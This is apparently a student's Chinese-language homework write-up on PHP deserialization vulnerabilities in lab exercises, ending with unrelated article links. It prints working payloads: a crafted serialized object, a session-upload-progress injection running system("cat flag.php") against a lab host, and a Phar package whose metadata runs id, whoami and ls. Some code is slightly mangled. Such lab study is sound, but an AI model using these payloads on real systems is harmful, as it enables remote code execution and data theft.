班级作业笔记报告0x09

反序列化漏洞

作业1:

反序列化介绍及魔术方法

包含flag.php文件,GET传参接收select参数,反序列化select值,__desreuct判断password不等于100,等于则结束,不等于则进入下一个判断,下一个判断判断username是否等于admin,等于admin则全局$flag参数,输出flag

构造序列化代码,构造Name类,username和password参数,并且值等于admin和100

<?php

class Name {

public function __construct(username, password) {

this-\>username = username;

this-\>password = password;

}

}

$Name = new Name("admin",100);

echo urlencode(serialize($Name));

?>

序列化后的值为O%3A4%3A%22Name%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22password%22%3Bi%3A100%3B%7D

传参拿到flag

作业2:

反序列化原生类及session反序列化

代码审计

构造PHP序列化代码

<?php

class OowoO{

public $mdzz='system("cat flag.php");';

}

$obj = new OowoO();

echo serialize($obj);

?>

构造POST请求头

<!DOCTYPE html>

<html lang="en" xmlns:http="http://www.w3.org/1999/xhtml">

<head>

<meta charset="UTF-8">

<title>1</title>

</head>

<body>

<form action="http://172.17.0.3/" method="post" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123"/>

<input type="file" name="file"/>

<input type="submit" value="submit"/>

</form>

</body>

</html>

合成请求包,将序列化代码放入filename参数的值中,序列化中有双引号的前面插入反斜杠\,因为PHP以管道符|后面的内容当作序列化字符串进行反序列化

执行cat flag.php命令查看flag,显示在文尾

执行id命令

系统根目录没有flag文件,但是网站根目录有/flag.php文件,可以读一读

作业3:

Phar反序列化

代码审计

GET传参filename参数,接收参数值,利用file_exists()函数反序列化执行eval

需要先用php生成phar文件,php生成phar文件代码,system函数里可选择填入需要执行的命令

<?php

class MyClass{

var $output = 'system("id;whoami;ls /;");';

}

$obj = new MyClass();

// 创建phar包

$phar = new Phar('shell.phar');

$phar->startBuffering();

$phar->setStub('<?php __HALT_COMPILER(); ?>'); // 必须的stub

phar-\>setMetadata(obj); // 写入序列化的MyClass对象

$phar->addFromString('test.txt', 'test'); // 随便加一个文件

$phar->stopBuffering();

?>

更改php.ini文件中phar.readonly属性为phar.readonly = Off,然后命令运行

php a.php

访问upload.html上传shell.phar文件

在首页index.php传参?filename=phar://upload/shell.phar执行命令

个人评价:

反序列化漏洞,我自己认为是每个学网安owasptop10毕业的漏洞,因为他真的很炫,光名字就感到很高级,而且他对代码审计要求也很苛刻,你要理解魔法类,幸好之前死磕过php,不会php的感觉就是千米高空走千米铁索,而且基本上有反序列化漏洞的基本上都会有RCE的存在,本人不是php大佬,并未深入研究反序列化漏洞哈哈

相关推荐
niucloud-admin1 小时前
PHP V6 单商户常见问题——在线升级版本失败后如何回退版本数据
php
stm32 菜鸟1 小时前
nucleo-f411re学习记录-9,双轴XY摇杆传感器
学习
南子北游1 小时前
Python学习(基础语法1)
开发语言·python·学习
0xR3lativ1ty1 小时前
关闭公网IP的两种方式
网络协议·tcp/ip·php
Yeh2020582 小时前
cookie与Session笔记
笔记
白晨并不是很能熬夜2 小时前
【PRC】第 2 篇:Netty 通信层 — NIO 模型 + 自定义协议 + 心跳
java·开发语言·后端·面试·rpc·php·nio
Atri厨2 小时前
X86存储器的段描述符学习随笔
学习
星幻元宇VR3 小时前
VR航空航天科普设备助力航天知识普及
人工智能·科技·学习·安全·vr·虚拟现实
d111111111d3 小时前
STM32-UART封装问题解析
笔记·stm32·单片机·嵌入式硬件·学习·算法
寒秋花开曾相惜3 小时前
(学习笔记)4.2 逻辑设计和硬件控制语言HCL(4.2.1 逻辑门&4.2.2 组合电路和HCL布尔表达式)
linux·网络·数据结构·笔记·学习·fpga开发